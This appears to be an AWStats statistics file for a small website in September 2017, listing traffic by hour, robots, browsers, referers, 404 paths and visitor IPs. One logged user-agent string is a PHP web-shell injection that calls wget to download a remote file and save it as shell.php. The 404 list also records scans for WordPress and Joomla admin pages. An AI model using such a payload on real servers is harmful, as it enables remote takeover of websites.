AWSTATS DATA FILE 6.7 (build 1.892)
# If you remove this file, all statistics for date 201709 will be lost/reset.

# Position (offset in bytes) in this file of beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1864                
POS_TIME 2535                
POS_VISITOR 11608               
POS_DAY 28759               
POS_DOMAIN 3415                
POS_LOGIN 3648                
POS_ROBOT 3803                
POS_WORMS 4537                
POS_EMAILSENDER 4668                
POS_EMAILRECEIVER 4811                
POS_SESSION 29628               
POS_SIDER 29836               
POS_FILETYPES 4946                
POS_OS 5206                
POS_BROWSER 5381                
POS_SCREENSIZE 5987                
POS_UNKNOWNREFERER 6061                
POS_UNKNOWNREFERERBROWSER 7167                
POS_ORIGIN 7671                
POS_SEREFERRALS 7815                
POS_PAGEREFS 7972                
POS_SEARCHWORDS 9023                
POS_KEYWORDS 9199                
POS_MISC 2199                
POS_ERRORS 9284                
POS_CLUSTER 3504                
POS_SIDER_404 9406                
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20171001005434 1 0 9088293451476
FirstTime 20170901003017
LastTime 20170930190151
LastUpdate 20171002031439 1 0 0 0 0
TotalVisits 540                 
TotalUnique 383                 
MonthHostsKnown 0                   
MonthHostsUnknown 454                 
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 0 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 36 316 25481541 28 56 1185586
1 35 158 10444070 63 107 1979006
2 57 414 27353270 39 71 890273
3 49 283 15868316 42 54 857052
4 47 460 32411548 28 61 807380
5 20 45 2441150 20 27 476588
6 22 68 6498171 29 39 645808
7 18 20 1191805 21 35 563248
8 23 205 23451931 36 64 510780
9 24 159 12212422 42 98 5592205
10 29 146 13122822 43 69 575139
11 21 70 6973823 37 72 888266
12 30 254 22211172 62 84 371875
13 28 308 33520249 39 64 362289
14 42 134 12373092 42 53 346846
15 45 393 38790584 33 72 210138
16 50 257 25112955 52 76 503846
17 44 237 23329119 56 77 402195
18 40 109 8896467 28 51 501769
19 55 358 30468287 33 63 622854
20 36 295 25369624 9 25 395497
21 34 305 20956745 39 74 707960
22 24 157 11877506 43 83 1104820
23 51 154 12913806 42 59 966261
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 860 5305 443270475
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 17
googlebot 160 4316394 20170930104734 0
\wbot[\/\-] 101 5997892 20170930135947 0
baiduspider 56 1690271 20170930033918 0
bbot 46 5382355 20170921091233 0
yandex 31 1234555 20170930225402 0
robot 19 1031010 20170928144617 0
python 10 157252 20170925071645 0
crawl 7 197587 20170921010231 0
commons\-httpclient 2 361851 20170908045728 0
infobot 2 78626 20170920024228 0
exabot 1 0 20170922145702 0
slurp 1 39313 20170924040413 0
surveybot 1 39313 20170916224226 0
java 2 153214 20170905012021 0
archive\.org_bot 1 39313 20170913134024 0
mj12bot 2 78626 20170921223611 0
netcraft 1 39313 20170906200516 0
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 11
css 944 20913494 0 0
eot 5 191025 0 0
png 171 89359813 0 0
ttf 7 564564 0 0
cgi 8 152331 0 0
woff 157 5961104 0 0
html 682 26457649 0 0
jpg 2109 271079493 0 0
xml 1 511 0 0
js 1201 28566417 0 0
gif 20 24074 0 0
END_FILETYPES

# OS ID - Hits
BEGIN_OS 13
winxp 34
winlong 24
unix 49
winnt 4220
win2000 1
win98 1
linuxubuntu 13
linux 331
macosx 485
bsdnetbsd 1
win95 2
win2003 9
Unknown 135
END_OS

# Browser ID - Hits
BEGIN_BROWSER 41
firefox28.0 11
msie6.0 18
firefox15.0 46
firefox3.6 2
firefox26.0 2
firefox52.0 31
firefox2.0.0.10 13
firefox54.0 331
curl 5
firefox49.0 11
msie8.0 11
firefox13.0.1 22
msie7.0 11
firefox16.0 92
firefox40.1 159
wget 44
msie9.0 39
firefox27.0 1
Unknown 48
firefox11.0 2
netscape 1
firefox50.0 15
firefox32.0 1
firefox48.0 6
firefox53.0 2
opera 8
firefox55.0 1466
firefox21.0 3
firefox29.0 14
msie5.5 2
firefox7.0.1 4
firefox30.0 11
firefox12.0 1
firefox33.0 1
mozilla 427
msie10.0 14
firefox51.0 1
firefox3.6.3 2
safari 2425
firefox15.0.1 1
firefox16.0.1 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 19
Mozilla/5.0_(compatible;_DuckDuckGo-Favicons-Bot/1.0;__http://duckduckgo.com) 20170911142514
Ruby 20170924183121
Scrapy/1.3.0_(_http://scrapy.org) 20170924212359
NokiaC3-00/5.0_(08.71)_Profile/MIDP-2.1_Configuration/CLDC-1.1_Mozilla/5.0_AppleWebKit/420__(KHTML,_like_Gecko)_Safari/420_ 20170930165236
TryingToBeAsFriendlyAsPossible 20170916014942
SafeDNSBot_(https://www.safedns.com/searchbot) 20170916133841
WhatWeb/0.4.8-dev 20170926190416
Twisted_PageGetter 20170905022646
Microsoft_Office_Excel_2014 20170918153829
Mozilla 20170913133558
<?php_system('wget_\ 20170928164444
Mozilla/5.0_(compatible;_Dataprovider.com;) 20170912175932
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20170915015709
Mozilla/5.0_(compatible;_ips-agent) 20170920081735
SEMrushBot 20170926173008
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20170922222625
PHP 20170903121737
libcurl/7.50.1_r-curl/2.8.1_httr/1.3.1 20170926091243
<?php_system('wget_101.99.5.63/doh.txt_-O_shell.php');?> 20170928142611
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 10
SEMrushBot 20170926173008
facebookexternalhit/1.1_(_http://www.facebook.com/externalhit_uatext.php) 20170922222625
SafeDNSBot_(https://www.safedns.com/searchbot) 20170916133841
Ruby 20170924183121
Scrapy/1.3.0_(_http://scrapy.org) 20170924212359
WhatWeb/0.4.8-dev 20170926190416
PHP 20170903121737
Twisted_PageGetter 20170905022646
TryingToBeAsFriendlyAsPossible 20170916014942
Microsoft_Office_Excel_2014 20170918153829
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 626 828
From1 4 4
From2 19 46
From3 30 128
From4 181 4299
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 1
google 19 46
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 20
https://proprostatit.com 6 6
https://www.foxweber.com 4 4
https://vsdshnik.com 3 3
http://artel116.ru 3 3
https://klumba55.ru 3 3
https://venerologiya.com 2 2
https://www.linkedin.com 1 1
http://www.sustainable-energy-and-agriculture-technology.com. 1 82
http://weburlopener.com 1 1
http://lm.facebook.com/l.php 1 1
http://www.sustainable-energy-and-agriculture-technology.com./css/cta.css 0 1
http://www.sustainable-energy-and-agriculture-technology.com./css/slimbox2.css 0 2
https://www.bing.com 0 6
https://mail.qq.com 1 1
https://cn.bing.com 1 2
http://www.sustainable-energy-and-agriculture-technology.com./css/templatemo_style.css 0 4
http://www.sustainable-energy-and-agriculture-technology.com./css/font-awesome.min.css 1 1
https://hcp.networksolutions.com/filemanager 1 1
http://www.marinetraffic.com 1 1
http://www.sustainable-energy-and-agriculture-technology.com./css/bootstrap.min.css 0 3
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 1
www.free+technogy.com 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 2
technogy.com 1
www.free 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 4
403 68 44880
302 1 0
404 1020 585350
301 2 566
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 52
/blog/wp-includes/wlwmanifest.xml 6 -
/robots.txt 226 -
/wordpress/ 18 -
/admin.php 5 -
/WEB%20PRUEBA/images/FONDO%20PANEL2.jpg 1 http://www.sustainable-energy-and-agriculture-technology.com/
/fonts/flexslider-icon.woff 2 http://www.sustainable-energy-and-agriculture-technology.com/css/templatemo_misc.css
/index.rdf 3 -
/css/circle.css 101 http://www.sustainable-energy-and-agriculture-technology.com/
/feed/ 1 -
/site/wp-includes/wlwmanifest.xml 6 -
/xb9987.php 1 -
//admin 1 -
/::::::::Sustainable%20Energy%20and%20Agri%20Tech%20-%20Redefining%20the%20%22consumer%20fresh%20market%22::0.7283987931441516::undefined::1::6.2::undefined 1 http://sustainable-energy-and-agriculture-technology.com/
/index.xml 3 -
/rss.xml 3 -
/wp-includes/wlwmanifest.xml 7 -
/joomla/robots.txt 12 -
/wp-admin/ 5 http://sustainable-energy-and-agriculture-technology.com/wp-login.php
/blog/ 19 -
/wp-admin 1 http://sustainable-energy-and-agriculture-technology.com
/WEB%20PRUEBA/images/FONDO%20PANE1.jpg 1 http://www.sustainable-energy-and-agriculture-technology.com/
/wp/ 18 -
/a.menu 2 -
/wordpress 1 -
/cms/wp-includes/wlwmanifest.xml 5 -
/xmlrpc.php 24 -
/blog 1 -
/blog/administrator/index.php 12 -
/js/lib/jquery.mousewheel-3.0.6.pack.js 135 http://www.sustainable-energy-and-agriculture-technology.com/
/index.rss 3 -
/blog/robots.txt 30 -
/user/ 1 -
/blog/feed/ 1 -
/bitrix/admin/index.php 2 -
/wp/wp-includes/wlwmanifest.xml 6 -
/administrator/index.php 17 http://sustainable-energy-and-agriculture-technology.com/administrator/
/index.atom 3 -
/user/register 1 -
/css/jquery.bxslider.css 103 http://www.sustainable-energy-and-agriculture-technology.com/
/wordpress/wp-includes/wlwmanifest.xml 6 -
/admin 5 -
/wp 1 -
/).removeClass( 2 -
/administrator/ 5 -
/WORDPRESS 1 -
/atom.xml 3 -
/a 2 -
/index.php 22 -
/joomla/administrator/index.php 12 -
/wp-login.php 170 -
/login 2 -
//js/stickup.min.js 1 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 454
75.105.91.111 155 1641 98931036 20170907025329
67.192.51.26 44 44 1729772 20170929234210
66.11.128.152 35 35 1375955 20170930190151
139.162.245.84 13 17 685652 20170929090115
134.249.80.194 12 12 471756 20170918205137
146.185.177.103 11 11 432443 20170928164548
151.80.238.152 11 11 432443 20170928141925
62.210.115.87 11 11 432443 20170928163653
89.144.12.15 11 11 432443 20170928142611
35.157.170.199 9 97 10961275 20170927064511
52.5.220.220 5 5 196565 20170914071916
208.187.186.164 2 47 5383334 20170912142516
199.30.231.1 1 1 39313 20170915192901
182.48.72.156 1 1 39313 20170901220817
130.91.229.98 2 47 5410607 20170913133900
67.43.11.169 1 1 39313 20170921220707
220.181.132.178 2 20 498239 20170923150315
72.79.50.246 0 1 23852 
66.23.226.178 1 1 39313 20170922172718
157.122.183.220 1 1 39313 20170913155143
13.59.121.129 4 4 157252 20170922164655
185.170.42.18 1 1 39313 20170921034318
106.120.160.119 1 1 39313 20170904020631
54.203.82.103 1 1 39313 20170904202136
54.81.112.109 0 3 39545 
182.186.202.94 3 47 5421668 20170904014538
5.170.74.142 2 48 5433469 20170910131631
180.169.66.98 2 46 5382355 20170925041814
40.77.177.26 1 45 5379262 20170926085030
79.103.172.111 1 1 39313 20170921063102
204.79.180.17 0 2 59221 
1.9.216.92 1 1 39313 20170929234615
204.79.180.0 0 1 1361 
209.99.141.64 1 1 39313 20170903213724
173.205.33.24 1 1 39313 20170902175924
52.4.244.57 1 1 39313 20170925200315
204.79.180.10 0 1 12201 
65.55.210.37 1 28 1386671 20170912024843
202.190.149.4 1 1 39313 20170914221257
50.202.38.3 1 1 39313 20170912173752
79.176.60.230 2 2 78626 20170904192557
66.220.146.23 0 1 420513 
82.228.0.101 1 1 39313 20170922160038
1.186.41.177 1 1 39313 20170907085457
88.99.214.210 1 1 39313 20170919233917
183.87.114.130 6 6 235878 20170929011659
177.157.18.146 1 1 39313 20170923233140
204.79.180.14 0 1 5800 
37.201.6.37 7 7 275191 20170928154030
68.33.89.198 6 138 16147065 20170904203229
173.209.212.153 0 12 2242738 
149.56.8.227 1 1 39313 20170908095835
69.171.225.17 0 1 305704 
77.67.54.11 1 1 39313 20170902184750
117.193.86.27 1 1 39313 20170920090945
180.211.175.135 2 48 5384586 20170910220521
183.83.214.176 1 1 39313 20170902130718
84.77.201.144 1 1 39313 20170916114914
59.97.94.101 1 1 39313 20170917022949
54.184.43.134 1 1 39313 20170911114751
82.81.209.110 1 1 39313 20170924142243
173.252.90.238 0 1 322538 
66.249.83.74 0 4 1559692 
38.140.157.84 1 1 39313 20170921164037
60.254.121.47 1 1 39313 20170914105809
209.107.214.208 1 1 39313 20170915023602
204.79.180.18 0 1 7321 
182.187.103.12 1 1 39313 20170912080215
113.20.124.16 0 1 420513 
45.32.234.23 4 4 157252 20170905042959
66.102.6.106 1 1 39313 20170924143339
77.126.44.117 1 1 39313 20170908160402
182.48.73.6 1 1 39313 20170917075702
180.180.122.94 0 1 76607 
54.203.147.106 2 2 78626 20170925230944
150.242.174.242 1 1 39313 20170905213127
54.184.24.58 1 1 39313 20170925114504
66.102.8.223 0 1 30374 
34.207.137.146 1 1 39313 20170923231807
187.232.88.193 1 1 39313 20170928151924
159.45.129.14 4 52 5532959 20170912195709
211.129.57.10 0 1 110793 
104.168.141.15 1 1 39313 20170922054208
182.253.36.203 1 1 39313 20170910233900
105.184.114.54 1 1 39313 20170928132512
209.136.226.179 1 1 39313 20170914165319
60.51.118.81 1 1 39313 20170913215430
175.138.156.7 1 1 39313 20170913212726
83.66.40.113 1 1 39313 20170924164231
202.80.215.31 1 1 39313 20170905044555
162.244.35.14 1 1 39313 20170909021919
86.98.3.91 1 1 39313 20170917033944
179.187.160.246 1 1 39313 20170907215403
197.42.53.243 1 1 39313 20170926051842
145.130.146.225 1 1 39313 20170910171120
154.121.251.25 1 1 39313 20170901075031
159.203.169.21 1 11 276574 20170926030832
69.84.207.246 2 8 511925 20170926142035
41.144.38.88 1 1 39313 20170904025932
34.228.238.248 1 1 39313 20170928112814
31.13.114.75 0 1 107761 
63.250.9.250 1 1 39313 20170919165251
139.5.216.218 1 1 39313 20170909064844
202.83.101.24 1 1 39313 20170906071004
138.197.2.107 1 11 276574 20170903135550
146.185.144.64 1 1 39313 20170906030944
69.171.225.135 0 1 305704 
34.201.216.205 1 1 39313 20170927204639
112.5.248.158 1 1 39313 20170915204441
195.43.67.90 1 1 39313 20170927051016
205.182.132.57 2 46 5382355 20170921082622
101.96.9.165 2 2 88864 20170923150316
85.140.77.48 0 1 420513 
117.102.66.79 1 1 39313 20170919015345
122.174.59.36 1 1 39313 20170908165342
163.172.71.24 1 1 39313 20170929034717
54.209.91.59 1 1 39313 20170920093248
35.194.37.163 1 1 39313 20170918170114
201.150.14.236 1 1 39313 20170920180725
31.178.94.3 1 1 39313 20170904191254
162.227.205.253 0 1 76607 
27.0.145.3 0 1 305704 
94.205.253.226 1 1 39313 20170928064024
103.88.76.10 1 1 39313 20170913232526
80.249.68.240 1 1 39313 20170908140826
204.79.180.16 0 3 24718 
90.215.93.5 1 1 39313 20170920222043
208.108.164.196 0 1 76607 
138.197.111.48 1 11 276574 20170903043903
113.210.205.172 0 1 420513 
138.197.96.246 1 11 276574 20170929151210
195.184.208.4 1 1 39313 20170914130137
198.240.100.58 1 1 39313 20170908172259
182.253.43.177 1 1 39313 20170912223740
54.244.108.95 1 1 39313 20170904114239
54.234.251.175 1 1 39313 20170924183121
52.166.251.192 1 1 39313 20170924063640
173.209.212.154 0 7 646023 
77.67.54.10 1 1 39313 20170914011630
38.131.147.125 1 1 39313 20170912152028
167.57.191.22 1 1 39313 20170906115454
58.10.55.226 0 2 531306 
39.40.35.108 1 1 39313 20170927215551
71.42.209.126 4 86 10559196 20170906182046
89.178.240.33 1 1 39313 20170929000440
202.71.186.250 1 1 39313 20170919024021
86.177.34.146 2 2 78626 20170923194600
88.111.150.78 0 1 76607 
138.197.111.123 2 12 315887 20170920012746
60.243.85.156 1 1 39313 20170905101350
39.51.92.193 1 1 39313 20170920091805
167.114.174.95 4 4 118450 20170912175932
183.82.34.193 1 1 39313 20170925060221
24.185.226.124 2 46 5382355 20170927163639
106.120.162.111 1 19 453807 20170904020749
193.227.38.107 1 1 39313 20170912192818
37.47.236.16 0 1 76607 
41.72.13.159 1 1 39313 20170927085658
159.203.196.79 1 1 39313 20170903031114
52.53.218.94 1 1 39313 20170910072953
138.197.71.143 1 11 276574 20170913031726
60.254.100.217 0 2 611408 
104.244.231.241 1 1 39313 20170927105840
76.173.176.192 0 1 76607 
220.181.132.193 2 20 498239 20170925041938
200.89.47.214 0 1 76607 
68.33.75.74 2 3 189419 20170928085408
106.120.160.109 1 1 39313 20170925041747
162.252.200.72 2 46 5382355 20170902175446
188.120.234.187 1 1 39313 20170917111904
73.24.221.169 2 46 5382355 20170911151820
202.5.51.42 1 1 39313 20170901153009
180.24.82.250 1 1 39313 20170923035619
191.33.200.11 1 1 39313 20170924120117
187.207.177.244 0 1 76607 
54.185.97.104 1 1 39313 20170918141655
217.58.14.114 2 47 5410607 20170927041758
178.137.177.108 3 3 117939 20170925075722
52.10.245.104 4 4 157252 20170926031840
159.45.71.14 6 51 5584828 20170913171215
61.220.44.77 9 9 353817 20170914195712
31.132.181.54 1 1 39313 20170904104514
36.73.5.248 1 1 39313 20170909064037
69.171.225.144 1 1 0 20170916024849
91.209.229.78 1 1 39313 20170914110733
79.180.24.136 1 1 39313 20170925005511
187.19.211.41 1 1 39313 20170903072234
216.218.222.11 2 2 78626 20170920070105
202.28.46.118 0 1 305704 
34.214.61.252 1 1 39313 20170909083034
64.233.172.181 0 15 1464009 
69.171.225.74 0 1 23852 
31.166.113.69 1 1 39313 20170927071136
66.249.81.142 0 1 45528 
41.102.27.163 1 1 39313 20170915135251
66.249.92.152 1 1 39313 20170915015709
184.67.233.170 0 1 420513 
138.197.7.56 1 18 451122 20170906185209
93.41.18.221 1 1 39313 20170922161100
39.48.86.229 1 1 39313 20170906050432
180.191.119.102 2 47 5405217 20170930132003
78.63.244.243 1 1 39313 20170928161228
116.103.72.206 1 1 39313 20170909120816
1.32.93.243 1 1 39313 20170925151713
79.118.54.255 1 1 39313 20170926164641
49.206.124.162 1 1 39313 20170917022400
112.203.153.68 1 1 39313 20170921074041
66.249.93.203 0 22 1419324 
91.121.91.49 5 5 196565 20170923061441
138.197.6.74 1 11 276574 20170923090640
138.197.7.61 1 18 451122 20170926125109
187.41.51.158 1 1 39313 20170929151536
84.172.95.223 5 51 5644311 20170927110919
173.209.212.146 0 13 1814645 
195.218.21.103 1 1 39313 20170929221531
46.118.156.200 1 1 39313 20170921122048
54.196.6.41 1 1 39313 20170911232010
122.167.217.227 2 46 5382355 20170907153206
68.33.77.210 2 2 78626 20170930000932
14.140.225.176 1 1 39313 20170902072819
60.53.203.17 0 1 110793 
160.176.205.85 1 1 39313 20170907073429
93.37.80.117 2 46 5382355 20170907103351
187.147.108.239 1 1 39313 20170927153238
138.197.96.247 1 11 276574 20170923051643
110.232.250.90 1 1 39313 20170920030004
86.213.150.16 2 48 5433469 20170929041434
105.159.227.80 1 1 39313 20170908085049
192.227.246.245 1 1 39313 20170918053727
139.227.144.142 1 1 39313 20170911051459
122.174.70.238 1 1 39313 20170911051156
117.6.128.60 1 1 39313 20170926064020
204.79.180.7 0 4 248312 
27.64.125.12 0 1 76607 
185.114.242.145 1 1 39313 20170917192252
122.164.183.210 1 1 39313 20170913044852
193.70.9.5 1 1 39313 20170918215422
212.51.157.65 6 6 235878 20170925200344
186.176.90.245 1 1 39313 20170921001520
104.192.74.39 2 2 78626 20170913133558
52.21.196.44 1 1 0 20170907151422
138.197.11.118 1 11 276574 20170920013121
66.249.93.201 2 13 2046754 20170916122116
54.236.60.176 4 58 5658929 20170911132835
173.205.33.20 1 1 39313 20170902184911
138.197.96.195 1 11 276574 20170906154841
103.1.95.142 1 1 39313 20170922010658
37.105.138.146 1 1 39313 20170917052652
37.231.221.202 1 1 39313 20170927121255
125.18.29.234 1 1 39313 20170920033024
69.171.225.66 0 1 305704 
27.4.151.237 1 1 39313 20170911173017
130.211.208.236 1 1 39313 20170911112219
90.148.122.48 1 1 39313 20170909014453
82.214.112.82 4 92 10764710 20170913164646
81.138.72.149 1 1 39313 20170918033221
185.7.215.83 1 1 39313 20170905101137
69.171.225.22 0 1 305704 
38.145.89.106 1 1 39313 20170925191218
174.127.135.67 5 33 3715770 20170918153830
162.218.229.130 2 46 5382355 20170918153500
203.202.252.188 1 1 39313 20170912114348
185.104.248.67 1 1 39313 20170908032708
141.226.9.199 2 2 78626 20170903121737
138.197.7.116 1 18 451122 20170916103114
204.14.12.84 0 1 420513 
72.191.38.96 2 48 5385071 20170911142746
1.22.182.193 1 1 39313 20170928173641
77.46.132.176 1 1 39313 20170928232826
69.171.225.36 0 1 322538 
92.36.160.172 1 1 39313 20170911033049
54.87.203.89 2 20 498239 20170907151532
138.246.253.19 4 4 0 20170928094401
209.180.49.94 2 46 5382355 20170907191033
13.57.36.124 1 1 39313 20170917051126
62.159.244.133 2 48 5433469 20170912085934
38.145.79.184 1 1 39313 20170918030930
112.202.161.81 1 1 39313 20170923101507
204.79.180.22 0 2 6552 
92.253.55.215 1 1 39313 20170929085456
149.153.159.102 0 1 420513 
38.100.21.69 1 9 216546 20170918203850
138.197.7.112 1 18 451122 20170913041532
73.24.43.122 1 1 39313 20170908031214
90.74.199.241 1 1 39313 20170903220505
52.71.64.37 3 3 117939 20170927101242
173.209.212.150 2 14 678949 20170918004415
23.27.244.118 2 46 5382355 20170926171533
41.251.17.121 1 1 39313 20170923112352
54.154.179.40 1 1 39313 20170925062757
80.77.142.196 1 1 39313 20170928211939
208.113.167.31 4 4 157252 20170924212359
121.97.16.65 1 1 39313 20170922014627
156.197.213.148 1 1 39313 20170906102124
163.172.68.99 1 1 39313 20170904205605
101.109.213.69 1 1 39313 20170902103449
93.37.80.153 2 46 5382355 20170904103226
172.56.26.91 0 1 110793 
34.230.55.166 1 1 39313 20170922154658
58.65.136.162 1 1 39313 20170920172842
66.102.6.19 1 1 39313 20170915192742
169.149.142.124 0 1 305704 
27.147.226.110 0 1 420513 
112.5.243.146 1 1 39313 20170912013348
66.249.83.75 0 2 46268 
212.126.160.6 1 1 39313 20170911093222
204.79.180.12 1 1 39313 20170927043758
54.255.150.217 1 1 39313 20170919230357
121.140.225.100 1 1 39313 20170917163321
148.251.43.239 4 4 157252 20170923190954
119.92.49.138 0 1 305704 
115.164.93.242 1 1 39313 20170918135740
54.208.102.37 1 1 39313 20170911142514
34.209.175.187 1 19 1884983 20170902184936
208.184.165.74 8 166 20932829 20170928135458
66.102.6.21 1 1 39313 20170918153344
139.99.8.51 2 2 78626 20170915184351
52.13.49.132 1 1 39313 20170904142836
204.79.180.4 0 1 2248 
54.184.44.131 1 1 39313 20170918114438
46.161.9.59 1 1 39313 20170922031554
49.149.29.126 1 1 39313 20170914212042
190.20.189.39 1 1 39313 20170914110622
130.105.215.51 1 1 39313 20170914062417
103.245.102.193 1 1 39313 20170928103926
8.28.16.254 4 4 202602 20170912195709
69.58.178.57 1 1 39313 20170920081735
120.28.191.8 1 1 39313 20170916103357
203.215.118.147 1 1 39313 20170924101927
182.99.195.54 0 1 63658 
183.82.16.245 1 1 39313 20170909120825
88.253.115.171 1 1 39313 20170930171741
172.58.17.182 2 46 5382355 20170902171012
41.111.22.35 1 1 39313 20170928180740
185.67.177.105 1 1 39313 20170908184435
187.143.41.210 0 1 76607 
35.189.14.80 1 1 39313 20170930140010
162.224.164.135 0 1 76607 
62.197.235.1 2 46 5382355 20170924154344
117.200.127.117 1 1 39313 20170907084458
54.209.157.129 2 2 78626 20170908190755
95.85.31.155 1 1 39313 20170916133841
46.99.55.180 1 1 39313 20170921110807
138.197.71.180 1 11 276574 20170929054039
41.133.143.159 1 1 39313 20170919144440
182.185.144.49 1 1 39313 20170921083339
103.5.113.19 1 1 39313 20170903230014
52.91.196.211 1 1 39313 20170929181832
54.184.250.215 2 2 78626 20170911231614
199.116.173.196 4 4 202602 20170913171143
66.249.82.68 0 1 76607 
24.67.149.31 1 1 39313 20170910053540
220.181.132.199 2 20 498239 20170904020541
112.5.248.140 1 1 39313 20170930185909
52.91.152.30 4 58 5658929 20170926190419
66.249.83.76 0 5 242809 
91.121.114.64 1 1 39313 20170919030302
85.65.122.173 1 1 39313 20170913125455
138.197.96.249 1 11 276574 20170916103030
182.253.62.135 1 1 39313 20170916051815
188.163.72.15 2 2 78626 20170926173027
105.105.84.174 1 1 39313 20170926201936
199.249.224.44 1 1 39313 20170922003420
54.80.200.255 2 2 78626 20170905231315
180.243.182.98 0 1 110793 
122.129.79.33 1 1 39313 20170921104631
67.1.145.19 2 50 5409185 20170925232445
204.79.180.8 0 2 46760 
186.230.20.243 1 1 39313 20170903200037
199.87.154.255 1 1 39313 20170921034251
65.55.210.144 1 43 2964973 20170906213750
91.180.109.64 1 1 39313 20170927061320
66.249.93.199 0 11 1916277 
103.217.108.125 1 1 39313 20170909232029
112.197.211.240 1 1 39313 20170916100839
176.63.236.19 1 1 39313 20170928043953
173.208.248.90 2 2 78626 20170912030607
103.35.243.198 1 1 39313 20170904114922
94.200.7.142 1 1 39313 20170920040125
112.202.166.186 1 1 39313 20170928120342
35.193.120.81 1 1 39313 20170915124334
119.15.155.10 1 1 39313 20170916185306
203.177.135.138 1 1 39313 20170922103649
47.11.199.3 2 47 6820748 20170918021601
192.243.53.51 2 2 78626 20170926173008
68.107.179.228 2 47 5410607 20170913215531
180.168.141.226 2 46 5382355 20170904020604
197.156.95.230 1 31 1943450 20170930165009
151.250.77.149 1 1 39313 20170923174240
195.22.127.71 1 1 39313 20170929183915
189.19.168.49 1 1 39313 20170928112428
74.58.181.80 0 1 76607 
103.219.1.242 1 1 39313 20170903031233
175.157.242.127 0 1 305704 
37.7.168.111 1 1 39313 20170925144604
82.145.45.90 1 1 39313 20170924060159
121.131.75.108 1 1 39313 20170906052603
112.5.243.168 1 1 39313 20170921203836
54.241.188.32 2 46 5382355 20170901003018
68.228.37.177 2 46 5382355 20170911085335
104.237.242.8 1 1 39313 20170930022343
64.233.172.179 0 5 210332 
66.70.202.183 1 1 39313 20170921173914
94.23.171.176 2 2 78626 20170919072828
93.86.237.227 1 1 39313 20170928223058
183.83.99.78 1 1 39313 20170924141053
83.7.42.22 1 1 39313 20170920011827
18.221.103.128 1 1 39313 20170926033643
41.182.201.30 1 1 39313 20170909070850
35.184.93.156 1 1 39313 20170915213450
54.70.126.88 1 1 39313 20170925175839
54.212.83.20 1 1 39313 20170911141146
201.18.18.173 2 2 78626 20170902101733
84.238.40.253 1 1 39313 20170921164003
54.175.164.41 0 1 76607 
51.36.80.43 1 1 39313 20170919054550
158.69.229.69 1 1 39313 20170907233533
212.143.233.86 1 1 39313 20170925055842
192.52.242.181 1 1 39313 20170908030141
45.55.231.219 1 1 39313 20170906133712
66.220.152.137 0 1 322538 
24.159.19.11 1 1 39313 20170921135723
106.120.162.96 1 35 1806503 20170925042141
177.53.245.98 1 1 39313 20170915044001
54.153.34.68 1 1 39313 20170905152921
34.211.191.3 1 1 39313 20170913122500
34.229.22.173 0 1 76607 
85.17.29.71 1 1 39313 20170925085241
209.88.198.82 1 1 39313 20170910004602
52.90.157.190 1 1 39313 20170917103737
106.120.162.108 2 46 5382355 20170923150346
73.24.142.172 3 52 5449762 20170925193543
182.185.54.36 1 1 39313 20170921144755
52.70.48.63 1 1 39313 20170925195650
95.211.230.94 1 1 39313 20170922003631
223.30.68.222 1 1 39313 20170917100309
112.215.173.103 0 1 305704 
178.137.82.201 4 4 157252 20170914161840
35.187.60.148 8 20 1655796 20170916014942
